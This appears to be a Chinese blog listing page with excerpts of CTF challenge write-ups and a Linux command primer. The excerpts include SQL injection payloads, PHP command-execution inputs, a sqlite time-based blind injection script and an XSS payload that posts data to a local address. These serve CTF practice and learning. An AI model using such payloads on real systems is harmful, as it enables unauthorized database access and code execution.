ISCTF2023复现
1z_Ssql(sql注入)username=1' or 1=1# //illegal words!username=1'# //用户名或密码错误username=-1' or 1 order by 3# //回显You are so smart! Let me give you a hint ↓ 5aSn5L2s77yM5L2g6L+Z5LmI6IGq5piO5bqU6K+l5LiN6ZyA6KaBaGludOWQpz8=,但是没用,说明等号被过滤了username=-1' or 1 order by 4# //用户名或密码错误username=-1' union select 1,2,3# //illegal words!username=union //illegal words!,尝试后双写和大写都不能绕过username=select //用户名或密码错误尝试布尔盲注username=0' or if(substr(database(),1,1)=c,true,false) ...
polarctf靶场
不仅为了刷题,更为了贴纸!(咋要200polar币才能兑换哇) swp(php特性)扫目录就能找到/.index.php.swp,访问得到源码 function jiuzhe($xdmtql){ return preg_match('/sys.*nb/is', $xdmtql);}$xdmtql = @$_POST['xdmtql'];if (!is_array($xdmtql)) { if (!jiuzhe($xdmtql)) { if (strpos($xdmtql, 'sys nb') !== false) { echo 'flag{*******}'; } else { echo 'true .swp file?'; } } else { ...
2025polarctf春季个人赛-wp
CRYPTObeginnerfrom Crypto.Util.number import long_to_bytes# 给定的结尾数值suffix = 16732186163543403522711798960598469149029861032300263763941636254755451456334507142958574415880945599253440468447483752611840# 验证suffix是否是2^125的倍数bits_125 = 1 << 125if suffix % bits_125 != 0: raise ValueError("Suffix is not divisible by 2^125, no solution exists.")# 计算S' = suffix / 2^125s_prime = suffix // bits_125# 计算模数5^125mod_5_125 = 5 ** 125# 计算2^9875在模5^125下的逆元inv_2_9875 = pow(2, -9875,...
萌新-web
知识点在之前都学到了,现在就只是做题和补充 web1(php特性)<?php# 包含数据库连接文件include("config.php");# 判断get提交的参数id是否存在if(isset($_GET['id'])){ $id = $_GET['id']; # 判断id的值是否大于999 if(intval($id) > 999){ # id 大于 999 直接退出并返回错误 die("id error"); }else{ # id 小于 999 拼接sql语句 $sql = "select * from article where id = $id order by id limit 1 "; echo "执行的sql为:$sql<br>"; # 执行sql 语句 ...
ctfshow_web
web签到题(源码泄露)源码泄露,注释base64解码 web2(sql注入)简单sql注入,post传参username和password password=1&username=1' or 1=1# //回显欢迎你,ctfshowpassword=1&username=-1' or 1=1 order by 4# //无回显password=1&username=-1' or 1=1 order by 3# //回显欢迎你,ctfshowpassword=1&username=-1' union select 1,2,3# //回显2password=1&username=-1' union select 1,database(),3# //回显web2password=1&username=-1' union select 1,(select group_concat(table_name) from information_schema.tables...
linux基础
一.常见命令(含解释及补充) 1.ls:列出文件目录 选项 作用 示例 -a 列出所有文件(包括隐藏文件) ls -a -l 列出文件及属性,注意大部分操作系统以ll来代替ls -l ls -l -la 列出所有文件及属性(包括隐藏文件) ls -la -h 以易读单位显示文件大小(如 KB、MB,需与 -l 连用) ls -lh -t 按最后修改时间排序(最新文件在前) ls -lt -r 反向排序(配合 -t 或 -S 使用) ls -ltr -S 按文件大小排序(从大到小) ls -lS -R 递归列出子目录内容(显示目录树结构) ls -R --color 彩色输出(默认启用,不同文件类型颜色不同) ls --color=auto -i 显示文件的 inode 编号 ls -i -d 仅显示目录本身(不列出目录内容) ls -d */ / 显示根目录下文件 ls...
web入门-命令执行(已完结)
一.前置知识好像也没什么需要提前知道的,在题目中慢慢积累总结就行 具体的可以参考下写的另一篇文章linux基础 二.题目web29(过滤flag)<?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);} 在输入中过滤flag,通过通配符?或者*即可绕过(?表示匹配一个字符,*表示匹配多个字符) c=system("ls"); c=system("cat f*.php"); //由于注释,需在源代码中找到flagc=system("tac f*.php"); //倒序可以直接输出flagc=echo `tac...
VNCTFwp
WEB奶龙回家在做的时候尝试了时间盲注,但是MySQL中的sleep和benchmark被ban了,后面尝试无果,看wp才知道是sqlite的时间盲注,先fuzz测试下waf 可知union,benchmark,sleep被过滤,但是实测空格和等号也被过滤了,用/**/代替空格,sqlite中的randomblob()来进行延时,最终脚本如下 import requestsimport timeurl = 'http://node.vnteam.cn:43292/login'flag = ''for i in range(1, 500): low = 32 high = 128 mid = (low + high) // 2 while low < high: time.sleep(0.2) # 构造注入payload payload =...
HGAMEwp
WEBPacman直接在源码中找通关逻辑,在index.js中就可以找到,但是有两个,之前找错了,一直交没对 拿出来base64+栅栏2栏就行 MysteryMessageBoard通过弱口令爆破登录shallot用户,密码888888,然后插入xss的payload后访问/admin <script>var xhr=new XMLHttpRequest();xhr.open("POST", "http://127.0.0.1:8888/", true);xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");xhr.send("comment=" +...